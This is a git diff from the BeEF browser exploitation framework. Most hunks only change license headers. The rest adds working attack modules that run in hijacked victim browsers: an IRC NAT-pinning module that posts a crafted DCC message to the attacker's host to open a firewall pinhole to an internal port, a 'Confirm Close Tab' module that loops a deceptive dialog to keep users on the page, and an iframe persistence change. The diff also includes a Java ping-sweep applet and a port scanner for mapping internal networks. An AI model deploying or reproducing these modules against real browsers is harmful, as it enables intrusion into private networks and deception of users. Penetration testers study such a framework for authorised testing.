8cb1549e1..0cb515b6b 100644 --- a/modules/network/detect_soc_nets/module.rb +++ b/modules/network/detect_soc_nets/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Detect_soc_nets < BeEF::Core::Command diff --git a/modules/network/detect_tor/command.js b/modules/network/detect_tor/command.js index 78b94c763..fb9dc6a47 100644 --- a/modules/network/detect_tor/command.js +++ b/modules/network/detect_tor/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { if (document.getElementById('torimg')) { diff --git a/modules/network/detect_tor/config.yaml b/modules/network/detect_tor/config.yaml index d0294391e..5dc3db360 100644 --- a/modules/network/detect_tor/config.yaml +++ b/modules/network/detect_tor/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/network/detect_tor/module.rb b/modules/network/detect_tor/module.rb index f75c91be9..05f654bf4 100644 --- a/modules/network/detect_tor/module.rb +++ b/modules/network/detect_tor/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Detect_tor < BeEF::Core::Command diff --git a/modules/network/dns_enumeration/command.js b/modules/network/dns_enumeration/command.js index 4e3ea47d0..011af3b91 100644 --- a/modules/network/dns_enumeration/command.js +++ b/modules/network/dns_enumeration/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var dns_list = "<%= @dns_list %>"; diff --git a/modules/network/dns_enumeration/config.yaml b/modules/network/dns_enumeration/config.yaml index 93327e416..415e79889 100644 --- a/modules/network/dns_enumeration/config.yaml +++ b/modules/network/dns_enumeration/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/network/dns_enumeration/module.rb b/modules/network/dns_enumeration/module.rb index 21449af1d..c68595372 100644 --- a/modules/network/dns_enumeration/module.rb +++ b/modules/network/dns_enumeration/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # # # DNS Enumeration diff --git a/modules/network/internal_network_fingerprinting/command.js b/modules/network/internal_network_fingerprinting/command.js index 71d742f55..ef7e669a6 100644 --- a/modules/network/internal_network_fingerprinting/command.js +++ b/modules/network/internal_network_fingerprinting/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var dom = document.createElement('b'); @@ -97,7 +88,8 @@ beef.execute(function() { new Array("Zenoss Core",":8080",false,"/zport/dmd/favicon.ico",16,16), new Array("BeEF",":3000",false,"/ui/media/images/beef.png",200,149), new Array("BeEF (PHP)",":80",false,"/beef/images/beef.gif",32,32), - new Array("Wordpress",":80",false,"/wp-includes/images/wpmini-blue.png",16,16) + new Array("Wordpress",":80",false,"/wp-includes/images/wpmini-blue.png",16,16), + new Array("Glassfish Server",":4848",false,"/theme/com/sun/webui/jsf/suntheme/images/login/gradlogsides.jpg", 1, 200) ); // for each ip diff --git a/modules/network/internal_network_fingerprinting/config.yaml b/modules/network/internal_network_fingerprinting/config.yaml index 2b87ff7c9..46ef6e363 100644 --- a/modules/network/internal_network_fingerprinting/config.yaml +++ b/modules/network/internal_network_fingerprinting/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/network/internal_network_fingerprinting/module.rb b/modules/network/internal_network_fingerprinting/module.rb index b4eff3e26..91a74a2e9 100644 --- a/modules/network/internal_network_fingerprinting/module.rb +++ b/modules/network/internal_network_fingerprinting/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # # # Internal Network Fingerprinting diff --git a/modules/network/nat_pinning_irc/command.js b/modules/network/nat_pinning_irc/command.js new file mode 100644 index 000000000..21d3f52eb --- /dev/null +++ b/modules/network/nat_pinning_irc/command.js @@ -0,0 +1,45 @@ +// +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +beef.execute(function() { + var privateip = '<%= @privateip %>'; + var privateport = '<%= @privateport %>'; + var connectto = '<%= @connectto %>'; + + function dot2dec(dot){ + var d = dot.split('.'); + return (((+d[0])*256+(+d[1]))*256+(+d[2]))*256+(+d[3]); + } + + var myIframe = beef.dom.createInvisibleIframe(); + var myForm = document.createElement("form"); + var action = "http://" + connectto + ":6667/" + + myForm.setAttribute("name", "data"); + myForm.setAttribute("method", "post"); + //it must be multipart/form-data so the message appears on separate line + myForm.setAttribute("enctype", "multipart/form-data"); + myForm.setAttribute("action", action); + + + //create message, refer Samy Kamkar (http://samy.pl/natpin/) + x = String.fromCharCode(1); + var s = 'PRIVMSG beef :'+x+'DCC CHAT beef '+dot2dec(privateip)+' '+privateport+x+"\n"; + + //create message textarea + var myExt = document.createElement("textarea"); + myExt.setAttribute("id","msg_<%= @command_id %>"); + myExt.setAttribute("name","msg_<%= @command_id %>"); + myForm.appendChild(myExt); + myIframe.contentWindow.document.body.appendChild(myForm); + + //send message + myIframe.contentWindow.document.getElementById("msg_<%= @command_id %>").value = s; + myForm.submit(); + + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Message sent'); + +}); diff --git a/modules/network/nat_pinning_irc/config.yaml b/modules/network/nat_pinning_irc/config.yaml new file mode 100644 index 000000000..fead9f598 --- /dev/null +++ b/modules/network/nat_pinning_irc/config.yaml @@ -0,0 +1,15 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +beef: + module: + irc_nat_pinning: + enable: true + category: "Network" + name: "IRC NAT Pinning" + description: "Attempts to open closed ports on statefull firewalls and attempts to create pinholes on NAT-devices. The firewall/NAT-device must support IRC connection tracking. BeEF will automatically bind a socket on port 6667 (IRC). Then you can connect to the victims public IP on that port. For more information, please refer to: http://samy.pl/natpin/ ." + authors: ["Bart Leppens"] + target: + working: ["FF"] diff --git a/modules/network/nat_pinning_irc/module.rb b/modules/network/nat_pinning_irc/module.rb new file mode 100644 index 000000000..75ed299c2 --- /dev/null +++ b/modules/network/nat_pinning_irc/module.rb @@ -0,0 +1,33 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +class Irc_nat_pinning < BeEF::Core::Command + + def pre_send + BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind_socket("IRC", "0.0.0.0", 6667) + end + + def self.options + @configuration = BeEF::Core::Configuration.instance + beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host") + + return [ + {'name'=>'connectto', 'ui_label' =>'Connect to','value'=>beef_host}, + {'name'=>'privateip', 'ui_label' =>'Private IP','value'=>'192.168.0.100'}, + {'name'=>'privateport', 'ui_label' =>'Private Port','value'=>'22'} + ] + end + + def post_execute + return if @datastore['result'].nil? + save({'result' => @datastore['result']}) + + # wait 30 seconds before unbinding the socket. The HTTP connection will arrive sooner than that anyway. + sleep 30 + BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind_socket("IRC") + + end + +end diff --git a/modules/network/ping_sweep/command.js b/modules/network/ping_sweep/command.js index acddd61ea..0e4fa7513 100644 --- a/modules/network/ping_sweep/command.js +++ b/modules/network/ping_sweep/command.js @@ -1,19 +1,10 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var ips = new Array(); diff --git a/modules/network/ping_sweep/config.yaml b/modules/network/ping_sweep/config.yaml index 1e9fa9a7d..1fd9010d5 100644 --- a/modules/network/ping_sweep/config.yaml +++ b/modules/network/ping_sweep/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/network/ping_sweep/module.rb b/modules/network/ping_sweep/module.rb index cc8c7120d..28843fe48 100644 --- a/modules/network/ping_sweep/module.rb +++ b/modules/network/ping_sweep/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # # # Ping Sweep Module - jgaliana diff --git a/modules/network/ping_sweep_java/command.js b/modules/network/ping_sweep_java/command.js index cd5fcc719..657ae87a6 100644 --- a/modules/network/ping_sweep_java/command.js +++ b/modules/network/ping_sweep_java/command.js @@ -1,19 +1,10 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var ipRange = "<%= @ipRange %>"; diff --git a/modules/network/ping_sweep_java/config.yaml b/modules/network/ping_sweep_java/config.yaml index 5b11939b2..67c0ad693 100644 --- a/modules/network/ping_sweep_java/config.yaml +++ b/modules/network/ping_sweep_java/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/network/ping_sweep_java/module.rb b/modules/network/ping_sweep_java/module.rb index 4342f61f6..cf836dd98 100644 --- a/modules/network/ping_sweep_java/module.rb +++ b/modules/network/ping_sweep_java/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # # # Ping Sweep Module - jgaliana diff --git a/modules/network/ping_sweep_java/pingSweep.java b/modules/network/ping_sweep_java/pingSweep.java index 0459ebc6a..ea0b31076 100644 --- a/modules/network/ping_sweep_java/pingSweep.java +++ b/modules/network/ping_sweep_java/pingSweep.java @@ -1,77 +1,83 @@ -import java.applet.Applet; -import java.io.IOException; -import java.net.InetAddress; -import java.net.UnknownHostException; -import java.util.ArrayList; -import java.util.List; - -/* - * Coded by Michele "antisnatchor" Orru' for the BeEF project. - * Given a single IP or IP range, check without hosts are alive (ping sweep). - */ -public class pingSweep extends Applet { - - public static String ipRange = ""; - public static int timeout = 0; - public static List hostList; - - public pingSweep() { - super(); - return; - } - - public void init(){ - ipRange = getParameter("ipRange"); - timeout = Integer.parseInt(getParameter("timeout")); - } - - //called from JS - public static int getHostsNumber(){ - try{ - hostList = parseIpRange(ipRange); - }catch(UnknownHostException e){ //do something - - } - return hostList.size(); - } - - //called from JS - public static String getAliveHosts(){ - String result = ""; - try{ - result = checkHosts(hostList); - }catch(IOException io){ - //do something - } - return result; - } - - private static List parseIpRange(String ipRange) throws UnknownHostException { - - List addresses = new ArrayList(); - if (ipRange.indexOf("-") != -1) { //multiple IPs: ipRange = 172.31.229.240-172.31.229.250 - String[] ips = ipRange.split("-"); - String[] octets = ips[0].split("\\."); - int lowerBound = Integer.parseInt(octets[3]); - int upperBound = Integer.parseInt(ips[1].split("\\.")[3]); - - for (int i = lowerBound; i <= upperBound; i++) { - String ip = octets[0] + "." + octets[1] + "." + octets[2] + "." + i; - addresses.add(InetAddress.getByName(ip)); - } - } else { //single ip: ipRange = 172.31.229.240 - addresses.add(InetAddress.getByName(ipRange)); - } - return addresses; - } - - private static String checkHosts(List inetAddresses) throws IOException { - String alive = ""; - for (InetAddress inetAddress : inetAddresses) { - if (inetAddress.isReachable(timeout)) { - alive += inetAddress.toString() + "\n"; - } - } - return alive; - } -} +/* + * Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net + * Browser Exploitation Framework (BeEF) - http://beefproject.com + * See the file 'doc/COPYING' for copying permission + */ + +import java.applet.Applet; +import java.io.IOException; +import java.net.InetAddress; +import java.net.UnknownHostException; +import java.util.ArrayList; +import java.util.List; + +/* + * Coded by Michele "antisnatchor" Orru' for the BeEF project. + * Given a single IP or IP range, check without hosts are alive (ping sweep). + */ +public class pingSweep extends Applet { + + public static String ipRange = ""; + public static int timeout = 0; + public static List hostList; + + public pingSweep() { + super(); + return; + } + + public void init(){ + ipRange = getParameter("ipRange"); + timeout = Integer.parseInt(getParameter("timeout")); + } + + //called from JS + public static int getHostsNumber(){ + try{ + hostList = parseIpRange(ipRange); + }catch(UnknownHostException e){ //do something + + } + return hostList.size(); + } + + //called from JS + public static String getAliveHosts(){ + String result = ""; + try{ + result = checkHosts(hostList); + }catch(IOException io){ + //do something + } + return result; + } + + private static List parseIpRange(String ipRange) throws UnknownHostException { + + List addresses = new ArrayList(); + if (ipRange.indexOf("-") != -1) { //multiple IPs: ipRange = 172.31.229.240-172.31.229.250 + String[] ips = ipRange.split("-"); + String[] octets = ips[0].split("\\."); + int lowerBound = Integer.parseInt(octets[3]); + int upperBound = Integer.parseInt(ips[1].split("\\.")[3]); + + for (int i = lowerBound; i <= upperBound; i++) { + String ip = octets[0] + "." + octets[1] + "." + octets[2] + "." + i; + addresses.add(InetAddress.getByName(ip)); + } + } else { //single ip: ipRange = 172.31.229.240 + addresses.add(InetAddress.getByName(ipRange)); + } + return addresses; + } + + private static String checkHosts(List inetAddresses) throws IOException { + String alive = ""; + for (InetAddress inetAddress : inetAddresses) { + if (inetAddress.isReachable(timeout)) { + alive += inetAddress.toString() + "\n"; + } + } + return alive; + } +} diff --git a/modules/network/port_scanner/command.js b/modules/network/port_scanner/command.js index 415c914e6..dd633f7eb 100644 --- a/modules/network/port_scanner/command.js +++ b/modules/network/port_scanner/command.js @@ -1,19 +1,10 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var blocked_ports = [ 1, 7, 9, 11, 13, 15, 17, 19, 20, 21, 22, 23, 25, 37, 42, 43, 53, 77, 79, 87, 95, 101, 102, 103, 104, 109, 110, 111, 113, 115, 117, 119, 123, 135, 139, 143, 179, 389, 465, 512, 513, 514, 515, 526, 530, 531, 532, 540, 556, 563, 587, 601, 636, 993, 995, 2049, 3659, 4045, 6000, 6665, 6666, 6667, 6668, 6669, 65535 ]; diff --git a/modules/network/port_scanner/config.yaml b/modules/network/port_scanner/config.yaml index a1ac2d103..ea54c96c1 100644 --- a/modules/network/port_scanner/config.yaml +++ b/modules/network/port_scanner/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/network/port_scanner/module.rb b/modules/network/port_scanner/module.rb index 4b0957bdd..a76072c84 100644 --- a/modules/network/port_scanner/module.rb +++ b/modules/network/port_scanner/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # # # Port Scanner Module - javier.marcos diff --git a/modules/persistence/confirm_close_tab/command.js b/modules/persistence/confirm_close_tab/command.js new file mode 100644 index 000000000..9bdbb31f3 --- /dev/null +++ b/modules/persistence/confirm_close_tab/command.js @@ -0,0 +1,36 @@ +// +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +beef.execute(function() { + + function display_confirm(){ + if(confirm("Are you sure you want to navigate away from this page?\n\n There is currently a request to the server pending. You will lose recent changes by navigating away.\n\n Press OK to continue, or Cancel to stay on the current page.")){ + display_confirm(); + } + } + + function dontleave(e){ + e = e || window.event; + + if(beef.browser.isIE()){ + e.cancelBubble = true; + e.returnValue = "There is currently a request to the server pending. You will lose recent changes by navigating away."; + }else{ + if (e.stopPropagation) { + e.stopPropagation(); + e.preventDefault(); + } + } + + //re-display the confirm dialog if the user clicks OK (to leave the page) + display_confirm(); + return "There is currently a request to the server pending. You will lose recent changes by navigating away."; + } + + window.onbeforeunload = dontleave; + + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'Module executed successfully'); +}); diff --git a/modules/persistence/confirm_close_tab/config.yaml b/modules/persistence/confirm_close_tab/config.yaml new file mode 100644 index 000000000..40553840b --- /dev/null +++ b/modules/persistence/confirm_close_tab/config.yaml @@ -0,0 +1,16 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +beef: + module: + confirm_close_tab: + enable: true + category: "Persistence" + name: "Confirm Close Tab" + description: "Shows a confirm dialog to the user when he tries to close a tab. If he click yes, re-display the confirm dialog. Doesn't work on Opera < 12" + authors: ["antisnatchor"] + target: + user_notify: ["ALL"] + not_working: ["O"] \ No newline at end of file diff --git a/modules/persistence/confirm_close_tab/module.rb b/modules/persistence/confirm_close_tab/module.rb new file mode 100644 index 000000000..a523c63aa --- /dev/null +++ b/modules/persistence/confirm_close_tab/module.rb @@ -0,0 +1,12 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +class Confirm_close_tab < BeEF::Core::Command + + def post_execute + save({'result' => @datastore['result']}) + end + +end diff --git a/modules/persistence/iframe_above/command.js b/modules/persistence/iframe_above/command.js index 3cf076368..db8185d5f 100644 --- a/modules/persistence/iframe_above/command.js +++ b/modules/persistence/iframe_above/command.js @@ -1,19 +1,10 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { - beef.session.persistent(); + beef.dom.persistentIframe(); beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Links have been rewritten to spawn an iFrame.'); }); diff --git a/modules/persistence/iframe_above/config.yaml b/modules/persistence/iframe_above/config.yaml index 7bff8e43b..cb2a75350 100644 --- a/modules/persistence/iframe_above/config.yaml +++ b/modules/persistence/iframe_above/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/persistence/iframe_above/module.rb b/modules/persistence/iframe_above/module.rb index 053986199..59bb60847 100644 --- a/modules/persistence/iframe_above/module.rb +++ b/modules/persistence/iframe_above/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License 